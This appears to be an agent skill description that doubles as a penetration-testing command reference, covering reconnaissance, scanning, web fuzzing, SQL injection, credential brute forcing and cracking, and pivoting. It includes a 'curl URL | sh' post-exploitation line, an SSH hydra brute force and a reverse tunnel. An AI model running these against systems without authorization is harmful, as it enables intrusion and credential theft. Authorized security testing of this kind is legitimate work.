Pentest Commands Dynamic

Reference and execute essential penetration testing commands across reconnaissance, scanning, exploitation, and post-exploitation phases. This skill provides a comprehensive command reference for network scanning, web testing, credential attacks, pivoting, and evidence collection tools.

When to Use This Skill

Choose Pentest Commands Dynamic when you need to:

• Look up specific tool commands and options during an active engagement
• Chain multiple tools together for a specific testing objective
• Find the right command syntax for common pentest scenarios
• Build one-liners and automation scripts for repetitive testing tasks

Consider alternatives when:

• You need to understand methodology and planning (use Pentest Checklist Studio)
• You need in-depth tool guidance (use tool-specific skills like Metasploit, Burp)
• You need to write professional reports (use Ethical Hacking Smart)

Quick Start

Copy
# === RECONNAISSANCE ===
# Subdomain enumeration
subfinder -d target.com -silent | sort -u > subdomains.txt
# DNS resolution of discovered subdomains
cat subdomains.txt | httpx -silent -status-code -title > live_hosts.txt

# === SCANNING ===
# Full TCP port scan
nmap -p- --min-rate 5000 -oA full_scan target.com
# Service version detection on open ports
nmap -sC -sV -p 22,80,443,8080 -oA service_scan target.com

# === WEB TESTING ===
# Directory brute force
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -t 50
# Parameter discovery
arjun -u https://target.com/api/endpoint

# === CREDENTIAL TESTING ===
# SSH brute force (authorized testing only)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com -t 4

Core Concepts

Command Reference by Phase

Phase	Tool	Command
Recon	nmap	nmap -sn 10.0.0.0/24 (host discovery)
Recon	dig	dig +short target.com ANY
Scanning	nmap	nmap -sC -sV -p- target.com
Scanning	nikto	nikto -h https://target.com
Web	gobuster	gobuster dir -u URL -w wordlist
Web	sqlmap	sqlmap -u "URL?id=1" --batch --dbs
Web	ffuf	ffuf -w wordlist -u URL/FUZZ
Exploit	msfconsole	use exploit/...; set RHOSTS; exploit
Creds	hydra	hydra -l user -P list ssh://target
Creds	john	john --wordlist=rockyou.txt hashes.txt
Creds	hashcat	hashcat -m 1000 hashes.txt wordlist
Post	linpeas	curl -sL URL | sh
Pivot	chisel	chisel server -p 8000 --reverse

Network Reconnaissance Commands

Copy
# Host discovery across a subnet
nmap -sn 10.0.0.0/24 -oG - | grep "Up" | awk '{print $2}'

# Comprehensive port scan with service detection
nmap -sC -sV -O -p- --min-rate 5000 -oA comprehensive target.com

# UDP scan (top 100 ports — UDP is slow)
sudo nmap -sU --top-ports 100 -oA udp_scan target.com

# SMB enumeration
enum4linux -a target.com
smbclient -L //target.com -N
crackmapexec smb target.com --shares -u '' -p ''

# SNMP enumeration
snmpwalk -v2c -c public target.com

# Web technology detection
whatweb https://target.com
wappalyzer-cli https://target.com

# SSL/TLS assessment
sslscan target.com:443
testssl.sh https://target.com

# Email harvesting
theHarvester -d target.com -b google,linkedin -l 200

Configuration

Parameter	Description	Default
target	Target IP, domain, or CIDR range	Required
wordlist	Default wordlist for brute forcing	/usr/share/wordlists/rockyou.txt
threads	Concurrent threads for scanning tools	10
output_dir	Directory for scan results	./pentest_output
proxy	Proxy for web tools (Burp)	http://127.0.0.1:8080
user_agent	Custom User-Agent string	Tool default
timeout	Connection timeout in seconds	10
rate_limit	Max requests per second	Tool default

Best Practices

1. Save all tool output with -o flags — Every scanning tool supports output files. Use them: nmap -oA scan, gobuster -o dirs.txt, sqlmap --output-dir=results. You'll need this output for the report, and re-running scans wastes time.

2. Chain tools together with pipes for efficiency — subfinder -d target.com | httpx -silent | nuclei -t cves/ discovers subdomains, finds live hosts, and scans for CVEs in a single pipeline. Tool chaining is faster than running each tool separately.

3. Start with fast broad scans, then targeted deep scans — Run nmap -p- --min-rate 5000 first to find all open ports quickly, then nmap -sC -sV -p PORTS on the discovered ports for detailed analysis. This is faster than running a full -sC -sV -p- scan.

4. Use tmux or screen to manage multiple sessions — Run long-running scans in separate tmux panes. Use tmux new -s pentest and split panes for simultaneous scanning, exploitation, and note-taking. Sessions persist if your SSH connection drops.

5. Document commands in a living notes file — Keep a running log of every command and its output in a text file. Use a format like timestamp | tool | command | result summary. This becomes the backbone of your penetration test report.

Common Issues

Nmap scans are extremely slow on large networks — Use --min-rate 5000 for fast scanning and -T4 for aggressive timing. For host discovery, use -sn (ping scan) first, then port scan only live hosts. Avoid -p- on entire subnets — scan top 1000 ports first.

Gobuster/ffuf misses directories that exist — The wordlist may not contain the directory name. Try multiple wordlists: common.txt, big.txt, raft-medium-words.txt. Also try different extensions: -x php,html,js,txt. Some servers require specific headers — add -H "Host: target.com".

Hydra/medusa credential attacks trigger lockouts — Use -t 1 (single thread) and add delays (-W 30 in hydra) to avoid lockouts. Check the lockout policy first. For most engagements, test only a few high-probability passwords across all accounts rather than many passwords on one account.